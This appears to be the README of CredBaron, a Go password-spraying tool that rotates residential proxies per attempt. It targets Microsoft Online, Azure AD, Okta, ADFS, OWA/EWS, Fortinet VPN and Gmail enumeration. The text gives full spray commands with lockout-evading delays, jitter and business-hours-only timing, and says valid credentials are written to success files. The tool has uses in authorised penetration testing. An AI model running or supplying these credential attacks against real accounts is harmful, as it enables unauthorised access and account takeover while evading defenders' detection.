CredBaron is a Go port of CredMaster that uses residential proxy rotation instead of AWS API Gateway / FireProx. Every auth attempt can ride a different source IP, either from a proxy list or from a single rotating-endpoint URL.
# prebuilt release
https://github.com/dejisec/credbaron/releases
# or install
go install github.com/dejisec/credbaron/cmd/credbaron@latest
# or build from source
git clone https://github.com/dejisec/credbaron
cd credbaron && make build
./credbaron plugins listDocker:
docker build -t credbaron .
docker run --rm -v "$PWD:/work" -w /work credbaron spray --config config.jsonYou hand CredBaron a plugin name, a user list, a password list, and a proxy source. It spins up a worker pool (default 10) where each worker picks a fresh proxy URL from your source for every request. Each attempt retries up to 3 times with 2s backoff on transport errors, and the plugin classifies the response as success, failure, or potential. Before the pool spawns, CredBaron fires one pre-flight request through the proxy to confirm the target is reachable, so a dead proxy source surfaces immediately.
Successes, valid usernames, and the full console transcript all land in timestamped files under --output-dir. If you pass --resume <state.jsonl>, already-classified (user, password) pairs are skipped on the next run.
Confirm that your proxy is working:
./credbaron proxy check \
--proxy-endpoint 'http://user:pass@gate.provider.com:7777'
# or
./credbaron proxy check --proxy-file proxies.txt --count 5Spray Microsoft Online (msol plugin):
./credbaron spray \
--plugin msol \
-u users.txt -p passwords.txt \
--proxy-endpoint 'https://user:pass@gate.provider.com:7777' \
--threads 20 \
--jitter 10 --jitter-min 3 \
--passwords-per-delay 1 --delay 180 \
--colorWith a proxy list file instead:
./credbaron spray \
--plugin msol \
-u users.txt -p passwords.txt \
--proxy-file proxies.txt \
--proxy-strategy random14 plugins ship with the binary. Run credbaron plugins list to view the current set.
- Microsoft / Azure AD:
msol,msgraph,azvault,azuresso,o365enum - Federated / SSO:
adfs,okta,pingfed - Exchange:
owa,ews - VPN:
fortinetvpn - Enumeration:
gmailenum - Generic:
httpbrutehttppost
Two mutually-exclusive modes: --proxy-file <path> for a newline-separated list, or --proxy-endpoint <url> + optional --proxy-session-var <token> for a single gateway that rotates IPs per session. NTLM and PingFed plugins pin one proxy per credential attempt because those handshakes can't rotate mid-flight. --insecure-tls skips cert verification end-to-end (for self-signed OWA/EWS). See docs/proxies.md.
Four independent timing knobs, all optional, all compose:
- Jitter: random sleep before each attempt
- Batch: sleep every N attempts per worker
- Inter-password delay: sleep between password cycles
- Weekday warrior: only spray during business hours Mon–Fri
See docs/config.md for the full flag reference, --randomize, --stop-on-success, timeouts, UA rotation, and custom headers.
Every run writes timestamped files under --output-dir DIR (default .): a -success.txt of raw user:pass, a -validusers.txt of confirmed usernames, a .log transcript, and an optional .jsonl event stream with --json-output. See docs/config.md for filenames, and event kinds.
--resume <path> writes every classified attempt to a JSONL checkpoint. On re-run with the same path, already-tested pairs are skipped. See docs/resume.md.
Seven webhook backends, fire-and-forget with a 5-second timeout. See docs/notifications.md.
Everything on the CLI is also settable via JSON. CLI flags override config values. See docs/config.md for the full reference and configs/config.example.json for the complete shape.
./credbaron spray --config config.jsoncredbaron spray: the main event. All flags:credbaron spray --help.credbaron plugins list: view registered plugin names.credbaron proxy check: fire N test requests through the configured proxy source and print the egress IP each returned.--count N(default 3),--target URL(defaulthttps://ipinfo.io/json).
- docs/plugins.md: plugin reference, classification model, AADSTS codes, NTLM caveats
- docs/proxies.md: proxy configuration and stateful-auth stickiness
- docs/config.md: CLI flags, config file, timing, output, JSON events
- docs/notifications.md: notifier backends, pairing rules, Teams/Ntfy/Pushover details
- docs/resume.md: checkpoint / resume semantics